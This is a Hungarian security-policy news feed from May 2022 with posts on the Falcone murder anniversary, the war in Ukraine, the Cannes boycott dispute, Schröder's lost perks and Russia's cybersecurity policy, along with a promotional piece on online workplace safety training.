A szervezett bűnözés által alkalmazott erőszakkal a demokrácia és az igazságszolgáltatás erejét állította szembe hétfőn Sergio Mattarella olasz köztársasági elnök, aki a szicíliai autósztrádán 1992. május 23-án felrobbantott Giovanni Falcone bíró és kísérete tiszteletére tartott megemlékezésén vett részt.Új hozzáadása

Az államfő hangsúlyozta, hogy a harminc évvel ezelőtt a maffia által elkövetett merénylet napján “a fájdalom és a félelem megbénította” az olasz köztársaság életét. Ezzel egy időben viszont az események “lehetőséget adtak arra, hogy a maffia erőszakos támadására a demokratikus intézményrendszer és a jogállam eszközeinek erejével válaszoljunk”.

A jogász Sergio Mattarella, akinek politikus testvérét szintén a maffia ölte meg, hozzátette, hogy a szervezett bűnözést elsősorban a civil társadalom azonnali és határozott reakciója lepte meg: az 1992-es merényletek “megtörték az addigi csendet, és az embereknek bátorságot adtak, hogy együttműködjenek a hatóságokkal az újraindulás érdekében”.

A maffia elleni harcot egy pillanatra sem szabad feladni – mondta Mattarella, aki ugyanilyen társadalmi felelősségvállalást és elkötelezettséget szorgalmazott az Európa szívében most zajló háborúval szemben is, az ukrajnai konfliktusra utalva.

A köztársasági elnök Palermóban, a város sportstadionjában rendezett megemlékezésen szólalt fel, melyen a római kormány nagy része részt vett. Jelen voltak a maffiagyilkosságok áldozatainak rokonai, Giovanni Melillo országos maffiaellenes államügyész, valamint a szicíliai fiatalok küldöttségei.

Harminc évvel ezelőtt, 1992. május 23-án délután hat óra előtt néhány perccel pokolgép robbant a palermói repülőtér és a város közötti autósztráda egyik szakaszán, Capaci magasságában. A támadásban az éppen arra haladó gépkocsikonvoj megsemmisült: életét veszítette a célpontnak számító Falcone bíró és felesége, a szintén ügyész Francesca Morvillo, valamint a kíséretüket képző három rendőr. További huszonhármam megsebesültek.

A maffiaellenes ügyész meggyilkolását a Cosa Nostra szervezetét irányító keresztapa, Salvatore Riina rendelte el. Az ötszáz kilogrammos pokolgépet működésbe hozó gombot a szicíliai maffiaszervezet végrehajtó embere, Giovanni Brusca nyomta meg.

Falcone fejezetet írt a szervezett bűnözés elleni fellépés történetében: nevéhez fűződik az első maffiaellenes ügyészcsapat megalakítása. Falcone indította el a tömeges maffiapereket is, melyek során a szervezet több száz tagját állították bíróság elé. Falcone és a vele együttműködő ügyész- és rendőrcsapat érkezett el elsőként a Cosa Nostra csúcsán állókhoz, valamint felderítette a maffia politikai-gazdasági szálait.

Falcone közeli munkatársa Paolo Borsellino ügyész volt, akit 1992. júliusában, édesanyja palermói lakóházának ajtajában robbantottak fel egy közelben leparkolt autóba rejtett pokolgéppel. Falcone és Borsellino meggyilkolása fordulópontot jelentett az olasz állam és az akkor még legerősebbnek tartott szicíliai maffia küzdelmében, annál is inkább, mivel a hatóságok és részben a közvélemény nyomására a szervezet tagjai elkezdtek együttműködni. A megtért “pentitók” vallomásai a Cosa Nostra fokozatos lefejezéséhez vezettek. A szicíliai maffia helyét mára a calabriai ‘ndrangheta vette át.

Salvatore “Toto” Riinát 1993-ban tartóztatták le, 2017-ben börtönben halt meg. Bruscát 1996-ban fogták el, majd huszonöt év börtön után, mivel együttműködött a hatóságokkal, szabadlábra helyezték.

Falcone meggyilkolásának időpontja nem számított véletlennek, mivel 1992-ben éppen akkor zajlott az új olasz államfő megválasztása: az esélyes, Giulio Andreotti helyett a merénylet után két nappal, 1992. május 25-én Oscar Luigi Scalfarót választották meg.

 

The post Harminc éve gyilkolták meg a maffiaellenes szicíliai ügyészeket appeared first on .

Categories: Biztonságpolitika

Orosz agresszió: a brit katonai hírszerzés szerint óriási veszteségei lehetnek az orosz hadseregnek

Biztonságpiac - Tue, 05/24/2022 - 06:35
A brit katonai hírszerzés hétfői helyzetértékelése szerint az ukrajnai háború első három hónapjában meghalt orosz katonák száma valószínűleg hasonló a Szovjetunió által az afganisztáni háború kilenc éve alatt elszenvedett veszteségekéhez.

A londoni védelmi minisztérium által közzétett hírszerzési beszámoló szerint a jelentős mértékű veszteségek fő okai között van a rosszul megválasztott hadszíntéri taktika, a korlátozott légi fedezet, a rugalmasság hiánya, valamint az, hogy az orosz vezénylési láncolat hajlamos az elkövetett hibák megismétlésére.

A brit katonai hírszerzés szerint a Donyec-medencében zajló orosz offenzíva még tovább növeli az orosz fegyveres erők veszteségeit. A londoni hírszerzési tájékoztatás kitér arra is, hogy az orosz lakosság a múltban “érzékenyen” reagált az Oroszország által kezdeményezett háborúkban elszenvedett veszteségekre.

Az Ukrajnában elszenvedett veszteségek növekedésével e veszteségek egyre érzékelhetőbbekké válnak, és ez erősítheti Oroszországban a háborúval szembeni lakossági elégedetlenséget, valamint a hajlandóságot is arra, hogy az emberek hangot adjanak ennek az elégedetlenségnek – fogalmaz a brit katonai hírszerzés hétfőn ismertetett új helyzetértékelése.

London nem először utal arra, hogy az orosz hadsereget komoly veszteségek érhették az ukrajnai háborúban. A brit katonai hírszerzés egyik legutóbbi beszámolója azt valószínűsítette, hogy az orosz hadsereg az Ukrajna ellen indított háború februári kezdetén bevetett harcoló szárazföldi kontingens egyharmadát elveszíthette.

Egy másik brit hírszerzési beszámoló szerint Oroszország ebben a helyzetben jelentős létszámú “segéderőket” is bevet, és e kontingensekben valószínűleg több ezer csecsen is harcol. A londoni védelmi tárca szerint a hírszerzési adatok arra vallanak, hogy az Ukrajnában Oroszország által bevetett csecsenek között egyénileg jelentkező önkéntesek és a csecsen nemzeti gárdaezred tagjai is jelen lehetnek. A brit katonai hírszerzés szerint az ennyire “vegyes összetételű” alakulatok alkalmazása is azt jelzi, hogy Oroszországnak “jelentős erőforrás-problémái” vannak Ukrajnában.

Kneissl volt osztrák külügyminiszter lemondott a Rosznyeftyben viselt tisztségéről
Lemondott Karin Kneissl volt osztrák külügyminiszter az Rosznyefty felügyelőbizottsági tagságáról – közölte az orosz olajipari vállalat. Kneissl jelentős nemzetközi nyomás hatására meghozott döntése visszamenőlegesen, péntektől hatályos. Kneissl 2017 és 2019 között Ausztria külügyminisztere volt. 2018-ban meghívta Putyint az esküvőjére, amivel nagy feltűnést keltett.

The post Orosz agresszió: a brit katonai hírszerzés szerint óriási veszteségei lehetnek az orosz hadseregnek appeared first on .

Categories: Biztonságpolitika

Orosz agresszió: Duda szerint júniusban az EU-nak “ki kell nyitnia az ajtaját” Ukrajna előtt

Biztonságpiac - Tue, 05/24/2022 - 05:35
Andrzej Duda lengyel elnök kijelentette, hogy az Európai Uniónak meg kell nyitnia kapuit Ukrajna előtt, és tagjelölti státust kell neki adnia a júniusi EU-csúcson.

Erről a lengyel államfő Volodimir Zelenszkij ukrán elnökkel tartott közös sajtótájékoztatóján beszélt. “Ukrajnának most szüksége van a mi jelzésünkre, amely megnyitja az európai kapukat az ukrán állam és társadalom előtt, amely az európai közösségek része akar lenni” – hangoztatta Duda a Jevropejszka Pravda hírportál szerint. Kiemelte, hogy nagy jelentőséggel bírna, ha Ukrajna uniós tagjelölti státusáról a júniusi csúcson hoznának döntést.

“Arra kérek mindenkit, akinél eddig kétségek merültek fel, hogy gondolkodjon el. Az Európai Unióba törekvő országoknak egyértelmű jelzést kell kapniuk, hogy az EU kapui nyitva vannak” – hangsúlyozta a lengyel elnök. Duda azt is szorgalmazta, hogy fokozzák az Oroszországgal szembeni szankciós nyomásgyakorlást.

“Hogyan tud a világ békés úton segíteni a háború befejezésében? Csakis szankciókkal, határozott nyomással, csakis Oroszország elszigetelésével. A hatodik szankciócsomag kérdése az Európai Unión belül egy nagyon fontos kérdés. Ezúton fordulok azokhoz, akiknek még kétségeik vannak: felejtsék el a szokásos üzletkötéseket” – fogalmazott Duda.

A sajtótájékoztatón megkérdezték Zelenszkijtől, mi a véleménye arról a lakossági elektronikus petícióról, amelyben azt kezdeményezték, hogy a sorköteles korú férfiaknak engedélyezzék az ország elhagyását a hadiállapot ideje alatt is. A petíció több mint 25 ezer támogató aláírást kapott, így a törvény szerint az elnöknek válaszolnia kell rá.

“Nem tudom, kinek kellett volna ezt a petíciót címezni. Talán nekem, vagy talán a fiukat elvesztő szülőkhöz kellene szólni, azokhoz, akik életük árán védték ezt vagy azt a területet, ezt vagy azt a várost és többnyire nem azt a települést, ahol születtek. Ma naponta ötven-száz ember halhat meg főként a keleti országrészben, miközben megvédik államunkat és függetlenségünket, amiről annyit beszél a világon mindenki” – fejtegette Zelenszkij.

Közben az ukrán vezérkar vasárnap délutáni helyzetjelentésében arról számolt be, hogy a Donyec-medencében az orosz erők a nap folyamán főként Donyeck és Bahmut városok térségében folytatták támadóműveleteiket, elsősorban azzal a céllal, hogy az ukrán csapatokat visszaszorítsák egészen a donyecki és luhanszki régiók közigazgatási határain túlra, ugyanakkor a Donyec-medencei Avgyijivka, Kurahove, továbbá délen, a Mikolaij megyében lévő Novopavliszk, valamint Zaporizzsja irányában a harci cselekmények intenzitásának csökkenése volt megfigyelhető.

 

The post Orosz agresszió: Duda szerint júniusban az EU-nak “ki kell nyitnia az ajtaját” Ukrajna előtt appeared first on .

Categories: Biztonságpolitika

Orosz agresszió: Ukrán filmesek az orosz filmek teljes bojkottját szorgalmazták Cannes-ban

Biztonságpiac - Mon, 05/23/2022 - 16:35
Ukrán filmesek valamennyi orosz filmre nemzetközi bojkottot kértek a 75. cannes-i fesztiválon, beleértve Kirill Szerebrennyikov alkotásait. A kormánykritikus orosz rendező legújabb filmje, a Csajkovszkij felesége című történelmi dráma a hivatalos programban versenyez az Arany Pálmáért.

“Tényleg úgy gondoljuk, hogy mindent ki kéne tiltani, ami orosz” – mondta Andrew Fesiak ukrán filmproducer a fesztiválhoz kapcsolódó filmvásár amerikai pavilonjában az “orosz propagandáról” rendezett sajtótájékoztatón. “Az orosz filmesek nem állíthatják azt, hogy minden rendben, és ellenük nem hozható fel semmi, miközben ukrán kollégáik nem forgathatnak, vagy azért, mert menekülniük kell, hogy mentsék az életüket vagy azért, mert fegyvert kell fogniuk” – tette hozzá.

Az ukrán producer szerint Szerebrennyikov “egyáltalán nem ellenzéki, hiszen az egész karrierjét az orosz kormány finanszírozta”.

A vádakra válaszolva az orosz rendező az AFP hírügynökségnek elmondta: a Csajkovszkij felesége című filmjét “független orosz vállalkozások, magánalapítványok finanszírozták”.

“Mindig rákérdeznek Roman Abramovics szerepére, aki a filmet finanszírozó egyik alap részvényese. Abramovics nagyon sokat segíti a kortárs művészeti projekteket, a civil szervezeteket. Részt vett az Ukrajna és Oroszország közötti tárgyalásokon is” – mondta a rendező.

“Teljesen megértem, miért mondják (az ukránok), amit mondanak, hiszen szörnyű helyzetben vannak (…) de az orosz kultúra eltüntetése hatalmas tévedés lenne, és örülök, hogy a cannes-i fesztivál a jó megoldást választotta” – hangsúlyozta Szerebrennyikov.

A világ egyik legjelentősebb filmes mustrája idén nem fogad orosz delegációt, és nem szeretné, ha az orosz kormányhoz köthető bármilyen hivatalos személy vagy újságíró megjelenne a fesztiválon, amíg az Ukrajna elleni orosz invázió folytatódik. A kitiltás azonban nem vonatkozik a kormánykritikus orosz művészekre.

“Vannak olyan orosz művészek, újságírók, akik elhagyták Oroszországot. Szerebrennyikov olyan alkotó, aki maga is úgy gondolja, ha nem hagyta volna el Oroszországot, akkor cinkosa lenne ennek a háborúnak” – mondta Thierry Frémaux, a fesztivál művészeti igazgatója a megnyitó előtti sajtótájékoztatóján.

A Putyin rezsimjét nyíltan bíráló 52 éves rendező harmadik alkalommal kapott meghívást filmjével a fesztivál versenyprogramjába. Ő azonban korábban személyesen soha nem tudott megjelenni Cannes-ban, mert külföldre utazási tilalom volt ellene érvényben, miután két évvel ezelőtt egy sikkasztási – a támogatói szerint viszont koncepciós – ügyben feltételes szabadságvesztésre ítélték. Miután a büntetése véget ért, a háború kitörése után lelkiismereti okokra hivatkozva legálisan elhagyta Oroszországot, és Berlinben telepedett le.

Az orosz rendező szerint “nem szabad az embereket az állampolgárságuk miatt megtagadni”.

“Készen állunk kitörölni Csehovot, Dosztojevszkijt, Tolsztojt és más orosz szellemeket? Ez nem lenne igazságos. Nem igazságos embereket az állampolgárságuk miatt megtagadni” – fogalmazott.

Szerebrennyikov korábban is bírálta az orosz kormányt a szabadságjogok szűkítése miatt, valamint az Oroszország által külföldön indított háborúkat is elítélte, és részt vett tüntetéseken is. A Csajkovszkij felesége című filmjének cannes-i bemutatóján az Ukrajna ellen indított háború befejezésre szólított fel, amikor a szerdai díszbemutató végén megköszönte a közönség tapsát.

A fesztiváligazgató álláspontja szerint “nem az ukrán hatóságok kérik a teljes bojkottot, hanem csak olyan emberek, akik nagyon radikálisak”. “Meg tudom érteni ezt az álláspontot is, mert ezek az emberek bombák alatt élnek” – hangsúlyozta Frémaux.

Alexandre Rodnianski ukrán filmproducer, aki húsz évig Oroszországban élt, a Le Monde című napilapban a bojkott ellen foglalt állást. Szerinte “a legjelentősebb filmfesztiválok mindig meghívták az oroszországi dolgok aktuális helyzetéről tisztességes képet bemutató alkotásokat”.

“Azoknak az életében, akik a bucsai vérengzéseket elkövették, a kultúra szerepe minimális. Ők a propagandatévén nevelkedtek” – vélte a producer, aki szerint “egyedül a hiteles orosz kultúra segíthet megváltoztatni Oroszországot”.

Megrázta a fesztiválközönséget az ukrajnai Mariupolban forgatott dokumentumfilm
Megrázta a 75. cannes-i fesztiválon a közönséget az ukrajnai Mariupolban az orosz erők által március végén megölt litván rendezőnek, Mantas Kvedaraviciusnak a helyszínen forgatott utolsó dokumentumfilmje. Miközben a kelet-ukrajnai városban az Azovsztal üzemben az orosz erőkkel szemben utolsóként ellenálló ukrán Azov ezred tagjai sorra adják meg magukat, a Mariupolis 2 című dokumentumfilm azt mutatja meg, hogyan élnek tovább a helyiek a bombázások ellenére. Kvedaravicius már készített egy filmet Mariupolban a kelet-ukrajnai háború idején, amelyet 2016-ban a Berlini Nemzetközi Filmfesztiválon mutattak be. Az ukrajnai orosz invázió kezdetén, február végén visszatért a tengerparti városba, és megkereste azokat, akikről 2014-ben és 2015-ben forgatott. A narráció és zene nélküli, 1 óra 45 perces alkotásban egymást váltják a hosszú snittek a háborús tájképekről a helyiek mindennapi életét bemutató felvételekkel. Kiderül, hogyan próbálják meg a helyiek túlélni a háborút, közülük többen egy templom alagsorában elbújva. A film megmutatja, ahogy az emberek kijárnak levegőzni, ebédet főznek vagy valóságos expedícióra indulnak a lebombázott negyedekbe élelemért vagy egy elektromos generátorért. Mindeközben a bombázások és a lövések hangja folyamatosan követi a szereplőket. A dokumentumfilmet pár nappal a fesztivál kezdete előtt hívták meg a szervezők a hivatalos programba. A megnyitó ünnepségen videókapcsolaton keresztül bejelentkezett Kijevből Volodimir Zelenszkij ukrán elnök, és a kultúra felelősségéről beszélt a háború befejezésében. Az 1976-ban született Kvedaravicius litván alkotót akkor ölték meg az orosz inváziós erők, amikor az egy hónapig tartó forgatást követően megpróbálta elhagyni az ukrajnai kikötővárost. Az általa készített felvételeket vele dolgozó barátnője, Hanna Bilobrova hozta el, és a filmet Dounia Sichov vágóval együtt ő rakta össze.

 

The post Orosz agresszió: Ukrán filmesek az orosz filmek teljes bojkottját szorgalmazták Cannes-ban appeared first on .

Categories: Biztonságpolitika

Amit az online munkavédelmi és tűzvédelmi oktatásról tudni kell

Biztonságpiac - Mon, 05/23/2022 - 12:58

A munkavédelmi és tűzvédelmi oktatás kötelező, ami nem a véletlen vagy a törvényalkotók műve. A lényeges információk akár életeket is menthetnek éles helyzetekben. A profi előadóknak köszönhetően ráadásul a fontos, de valóban paragrafusokkal, szabályokkal tűzdelt témakörök olyan köntösbe bújhatnak, ami borítékolja az érdekes, figyelemfelkeltő és lebilincselő tájékoztatást. És ez még nem minden! Az oktatás online is igénybe vehető, ami hatalmas pozitívum, és ami számtalan előnnyel kecsegtet.

Miért annyira jó ötlet az online részvétel?

Több szempontból is praktikus a virtuális oktatás. Egyrészt nincsen helyhez, helyiséghez kötve, azaz roppantul költséghatékony. Mindenki az otthonából (home office) vagy a munkahelyéről élvezheti az információk átadását anélkül, hogy egy tapodtat is meg kellene tenni. Ez időtakarékosság szempontjából sem bír csekély jelentőséggel. Másrészt mivel ebben az esetben a munkavállalók igényei élveznek elsőbbséget, így könnyedén megoldható a munkarendhez való maximális alkalmazkodás. Tehát a napi rutint nem feltétlenül kell megszakítani, illetőleg megbeszélhető az az idősáv, ami mind produktivitás, mind egyéb tekintetben a lehető legideálisabb. Harmadrészt senkihez sem kell alkalmazkodni. Sem időben, sem térben. Azaz a munkavállalóknak egyáltalán nem szükséges együtt, közösen részt venni az oktatáson. A régimódi tájékoztatókra mindenki egyszerre ült be, ami egyáltalán nem mondható optimálisnak a cég működését szem előtt tartva. Arról nem is beszélve, hogy a különböző munkafolyamatok eltérő időbeosztást feltételeznek, tehát abszolút nem életszerű elvárás, hogy minden dolgozónak egy ugyanazon dátum és helyszín maradéktalanul megfeleljen.

Mindennek tetejében a digitalizált adminisztráció közbenjárásával nyomon követhetőek a teljesített oktatások, rögzíthetőek a teljesítések. Vagyis röviden és tömören, újfent idő, energia és nem kevés anyagi muníció spórolható meg egyetlen releváns döntéssel.

Gyakran változnak az ide vonatkozó törvények?

A szabályozások természetesen időközönként módosulnak, de ami fix és változatlan, hogy a munkavédelmi és tűzvédelmi oktatás elvégzése kötelező. Erre a legtöbben úgy gondolnak, mint egy olyan feladatra, ami kicsit sem lelkesítő, mondhatni a muszáj jellemzi leginkább, de mégsem kikerülhető. Az tény, hogy a részvétel nem megszeghető kötelezettség, viszont az nem evidencia, hogy egyrészt maga a leszervezés problematikus és bonyolult, másrészt az oktatás unalmas és felesleges. Ezek a törvények a dolgozók egészségéért születtek és azért, hogy veszélyhelyzetben minden lényeges információ a rendelkezésre álljon a motivált és eredményes cselekvés érdekében. A fenti feltételekkel az online oktatás a lehető legjobb választás, aminek a részletei a következő oldalon megtekinthetőek: http://ehs-guide.com

Végre pont tehető a kényelmetlenségek végére és egy vadonatúj dimenzió nyílhat meg, ahol az oktatásnak sem a megvalósítása, sem a kivitelezése, sem a végigcsinálása nem jelenthet akadályt. Sőt! A száraz paragrafusok új, érdekes értelmezést nyerhetnek, aminek hála az elsajátításuk is lényegesen egyszerűbbé válhat.

 

The post Amit az online munkavédelmi és tűzvédelmi oktatásról tudni kell appeared first on .

Categories: Biztonságpolitika

Orosz agresszió: Ukrajna támogatói még több fegyvert biztosítanak a védekezéshez

Biztonságpiac - Mon, 05/23/2022 - 12:10
Az eddiginél is több fegyvert biztosítanak az Ukrajnát támogató országok az orosz agresszió elleni védekezéshez, és jobban összehangolják együttműködésüket – mondta az amerikai védelmi miniszter Németországban a Ramstein amerikai légi támaszponton az Ukrajna önvédelmét szolgáló nemzetközi konzultációs fórum alakuló ülése után.

Lloyd Austin bejelentette, hogy a több mint 40 országot összefogó csoport képviselői ezentúl havi rendszerességgel tartanak értekezletet arról, hogy miként segíthetik fegyverekkel, katonai felszereléssel az orosz inváziós erők ellen védekező ukrán hadsereget.

Oroszország Ukrajna ellen indított háborújában döntő jelentőségű hetek következnek – hangsúlyozta a miniszter, hozzátéve, hogy lépést kell tartani a háború menetével, és megkettőzött erővel kell törekedni az ukrán csapatok jelentősen megnövekedett fegyverzet-, és lőszerszükségletének kielégítésére.

A tanácskozás konkrét eredményei közül kiemelte, hogy Németország ötven Gepard típusú légvédelmi páncélos járművet küld Ukrajnába, a brit kormány további légvédelmi fegyverzetet, a kanadai kormány pedig páncélozott járműveket ajánlott fel. Hozzátette, hogy az amerikai kezdeményezésre megszervezett országcsoport tevékenysége Ukrajna önvédelmi képességének hosszú távú biztosítását szolgálja, túlmutat az orosz agresszió elleni védekezésen.

Washington Oroszországgal kapcsolatos hosszabb távú, katonai vonatkozású céljairól kérdésre elmondta, tenni kell azért, hogy Oroszország ne ronthasson rá országokra úgy, mint Ukrajnára. Az atomháború lehetőségéről szóló orosz nyilatkozatokról azt mondta, hogy az ilyen “kardcsörtetés” veszélyes és senkinek sem használ, atomháborút pedig nem akar senki.

Az orosz megszállás alatt lévő moldovai, Dnyeszter melléki szakadár területeken történt robbantásokról ugyancsak újságírói kérdésre azt mondta, hogy még nem igazán látják, mi lehet a háttérben, és az ügy továbbra is a Pentagon “fókuszában” marad.

Christine Lambrecht német védelmi miniszter a tanácskozás után – az amerikai védelmi minisztertől függetlenül – tartott tájékoztatóján elmondta, hogy hazája továbbra is a nemzetközi partnerekkel együttműködve igyekszik segíteni Ukrajnának. Így nem csak a német gyártmányú Gepardokkal járulnak hozzá az orosz támadás alatt álló ország önvédelmi képességének erősítéséhez. Dolgoznak a többi között egy olyan terven is, miszerint Németország Szlovénia hadseregének szállít nehézfegyverzetet, Szlovénia pedig a saját – szovjet gyártmányú – felszereléseinek mozgósításával támogatja Ukrajnát.

A miniszter kiemelte, hogy kétmilliárd eurós (760 milliárd forint) keretet nyitottak meg Ukrajna önvédelmi képességének fejlesztésére, és jelezte, hogy Szlovénia mellett az Európa keleti részén fekvő, egykor szovjet megszállás alatt álló országok közül másokkal is készülnek közvetett módon támogatást juttatni Ukrajnának.

A megoldás előnye, hogy az ukrán hadsereg azonnal használatba veheti a szovjet gyártmányú, ismert fegyverrendszereket, szemben a német védelmi ipar termékeivel – például a Gepard páncélosokkal -, amelyek használatához ki kell képezni az ukrán katonákat.

A német sajtóban közölt hírösszefoglalók szerint számos további európai ország is készen áll nehézfegyverzettel segíteni az orosz inváziós erőkkel harcoló ukrán hadsereget. Köztük van Franciaország, Belgium és Hollandia is. Ugyanakkor nem mindegyik ragaszkodik ahhoz, hogy a támogatás minden részlete nyilvános legyen.

Ezzel összefüggésben Lloyd Austin a tanácskozást megnyitó – a rendezvény nyilvános részén tartott – beszédében kiemelte, hogy az Egyesült Államok és partnerei már ötmilliárd dollár (1770 milliárd forint) értékben szállítottak fegyvereket Ukrajnának. Ebből az amerikai támogatás értéke 3,7 milliárd dollár.

Csehország az egyik legnagyobb hadianyag szállítója Ukrajnának
Csehország Ukrajna négy-öt legnagyobb hadianyag szállítója közé tartozik – jelentette ki Tomás Kopecky, a cseh védelmi miniszter helyettese. “Az orosz agresszió ellen védekező Ukrajnába sok milliárd korona értékben küldött Csehország fegyvereket és hadianyagot” – mutatott rá Kopecky, de pontos adatot nem kívánt mondani. Hozzátette, hogy az Ukrajnába küldött hadianyagban szinte az összes fegyvernem és hadianyag megtalálható, a gránátvetőktől kezdve a nehézfegyverekig. Az Ukrajnának eddig küldött hadianyag és fegyverszállítások pontos értékét a minisztérium nem kívánja nyilvánosságra hozni. “Nagyon méltányos összegről van szó. Abszolút számokban az Ukrajnának küldött hadianyag-szállításokban a négy-öt legnagyobb szállító között vagyunk” – szögezte le a cseh védelmi miniszter helyettese. Nagyra értékelte, hogy a fegyverszállítások terén Csehország nagyon jól együttműködik Lengyelországgal, Szlovákiával és a balti államokkal. Hangsúlyozta, hogy az Ukrajnának nyújtott hadianyag- és fegyverszállításokat folytatni kell.

The post Orosz agresszió: Ukrajna támogatói még több fegyvert biztosítanak a védekezéshez appeared first on .

Categories: Biztonságpolitika

Orosz agresszió: Megvonták Gerhard Schröder volt német kancellár több juttatását

Biztonságpiac - Mon, 05/23/2022 - 08:35
Megvonta a német szövetségi parlament Gerhard Schröder több juttatását, mert a volt kancellár az Ukrajna elleni háború kezdete óta nem határolódott el Putyintól, és nem vált meg a Rosznyeft orosz energiaipari cégben betöltött tisztségétől – jelentették német hírportálok.

A parlament költségvetési bizottságában a kormánypártok – szociáldemokraták (SPD), Zöldek, liberálisok (FDP) – és a legnagyobb ellenzéki erő, a CDU/CSU jobbközép pártszövetség képviselőinek támogatásával elfogadott indítvány szerint Schröder nem kap többé közpénzt az egykori kormányfői tisztségéhez kapcsolódó tevékenységét szolgáló berlini iroda és stáb fenntartására. A volt kancellár a mintegy 8300 eurós nyugdíját megtarthatja, és továbbra is gondoskodik a védelméről a szövetségi bűnügyi hivatal (BKA).

A döntéssel hivatalosan csupán felfüggesztették az iroda és a személyzet fenntartásához szükséges költségekre szánt költségvetési támogatás folyósítását. Ezzel kapcsolatban a Frankfurter Allgemeine Zeitung című lap kiemelte, hogy az indítványban nem említik Schröder orosz vállalatokhoz vagy Putyinhoz fűződő kapcsolatait. Ennek hátterében az a megfontolás áll, hogy a juttatások elvonása bírósági úton támadható lenne, ha úgy tűnne, hogy megbüntetik a véleménye, a politikai nézetei miatt.

A szociáldemokrata politikus kancellárként – az SPD és a Zöldek 1998-2005 közötti koalíciójának vezetőjeként – barátkozott össze Putyinnal. Hivatali idejében egy 2004-es kijelentésével kellett leginkább megdöbbenést, amelyben úgy vélte, hogy az orosz elnök “kifogástalan demokrata”.

Az elveszített 2005-ös szövetségi Bundestag-választás után elvállalta az elnöki tisztséget az Oroszországot és Németországot Ukrajna és Lengyelország megkerülésével, a Balti-tenger alatt összekötő Északi Áramlat földgázvezeték megépítésére alapított cég (Nord Stream AG) felügyelőbizottságában, 2017-ben pedig a többségi tulajdonos orosz állam javaslatára a Rosznyeft kőolaj- és földgázipari társaság részvényesei választották meg ugyancsak felügyelőbizottsági elnöknek.

A volt kancellár többször elítélte az Ukrajna elleni agressziót. Április végén a New York Times című amerikai lapnak azt mondta, hogy hiba volt elindítani a háborút, és Putyinnál tett márciusi látogatása alapján úgy látja, hogy az orosz államfő be is akarja fejezni, “de ez nem olyan egyszerű”, mert “van néhány kérdés, amelyet tisztázni kell”. Schröder arról is szólt, hogy továbbra sem hajlandó teljesíteni az elhatárolódásra és a céges tisztségek visszaadására vonatkozó követeléseket. “Nem fogok elkezdeni mea culpázni” – mondta.

Schröder mégis távozik a Rosznyefty igazgatótanácsából
Schröder volt német kancellár bejelentette, hogy nem tudja meghosszabbítani mandátumát a Rosznyefty igazgatótanácsában – közölte honlapján az orosz olajipari vállalat. Schöderhez hasonlóan távozik a testülettől Matthias Warnig, az Északi Áramlat-2 gázvezetéket menedzselő Nord Stream 2 ügyvezető igazgatója. A Spiegel német hetilap szerint az Európai Parlamentben felmerült, hogy Schröder felkerüljön a szankciós listára, ha megtartja az orosz cégekben betöltött pozícióit. Február végén a BP olajipari vállalat közölte, hogy megválik a Rosznyeftyben lévő 19,75 százalékos részesedésétől.

The post Orosz agresszió: Megvonták Gerhard Schröder volt német kancellár több juttatását appeared first on .

Categories: Biztonságpolitika

Elfogadta a kiberbiztonsági politika főbb elveit az orosz biztonsági tanács

Biztonságpiac - Mon, 05/23/2022 - 07:35
Jóváhagyta a létfontosságú információs infrastruktúra biztonságpolitikai keretrendszerének tervezetét az orosz biztonsági tanács – jelentette be Nyikolaj Patrusev, a testület titkára.

Putyin a tanács ülésén célszerűnek nevezte fontolóra venni egy állami információvédelmi rendszer létrehozását a kormányzat és az államigazgatás információs infrastruktúrájának fenntartható működése érdekében. Elmondta, hogy Oroszország kritikus infrastruktúráját az elmúlt időben állami szinten megszervezett, célzott és összehangolt külső támadások érték. A kiemelt célpontok között a kormányzati portálokat, a médiumokat, a pénzintézeteket, a szociális szempontból fontos, tömegesen használt portálokat és hálózatokat nevezte meg.

“Elmondhatjuk, hogy az ellenünk irányuló kiberagresszió, valamint általában az Oroszországgal szembeni szankciók kudarcot vallottak” – mondta Putyin.

Azt hangoztatta, hogy az orosz fél az elmúlt években elvégzett szisztematikus munka eredményeként felkészült ezekre a támadásokra. Szavai szerint Oroszország nemcsak az információs infrastruktúráját védte meg, hanem saját technológiát is létrehozott.

Putyin ugyanakkor egy 2021-ben elvégzett ellenőrzésre hivatkozva azt mondta, hogy az állami szervek információs rendszereinek és kommunikációs hálózataik erőforrásainak többsége sebezhető tömeges támadások és romboló célzatú külső befolyás révén, különösen a legújabb generációs külföldi technológiák bevetése esetén.

“Meg kell erősítenünk a hazai digitális tér védelmét – itt nem lehetnek gyenge pontok. Elvi fontosságú a bizalmas információk és a polgárok személyes adatai kiszivárgásának kockázatát minimalizálni, egyebek között a hivatali, a kommunikációs és a hírközlési berendezések használatára vonatkozó szabályok ellenőrzésének megszigorítása révén” – hangoztatta Putyin.

Mint mondta, a kibervédelem jogi kerete érezhetően fejlődött Oroszországban, ami lehetővé tette a hatékonyság javítását, de a kihívások és a fenyegetések jellege dinamikusan és gyorsan változik. Emlékeztetett rá, hogy 2025-től az orosz állami szférában tilos lesz a külföldi információbiztonsági eszközöket használni.

Megismételte, hogy az orosz technológiai szuverenitás megerősítése érdekében a kormánynak a lehető leghamarabb meg kell teremtenie a modern orosz elektronikai komponensbázist, biztosítania kell az ehhez szükséges saját technológiai felszerelés kifejlesztését és bevezetését, beleértve a szoftver- és hardverkomplexumok gyártásához szükséges eszközöket is. Ehhez, mint mondta, igénybe kell venni a korábban meghirdetett “Digitális gazdaság” nemzeti program eszközeit és forrásait.

Putyin közölte: javaslatokat vár arra vonatkozóan, hogy miként lehet ösztönözni az importhelyettesítést ezen a területen, de arra is, hogy hogyan lehet a versenytársakat megelőzve saját, egyedi termékeket előállítani. A legfontosabb feladatok közé sorolta a külföldi szoftverek, számítástechnikai eszközök és távközlési berendezések használatához kapcsolódó kockázatok radikális csökkentését.

Patrusev pedig arról is beszélt, hogy az Egyesült Államok által támogatott online anonimitás megkönnyíti a kiberbűnözők tevékenységét és a rosszindulatú szoftverek ellenőrizetlen terjedését. Mint mondta, az Oroszország elleni kibertámadásokban gyakran vesznek részt a nyugati országok által anyagilag motivált hackerek.

 

The post Elfogadta a kiberbiztonsági politika főbb elveit az orosz biztonsági tanács appeared first on .

Categories: Biztonságpolitika

KAMERA! TESSÉK!

Air Base Blog - Mon, 05/23/2022 - 06:58

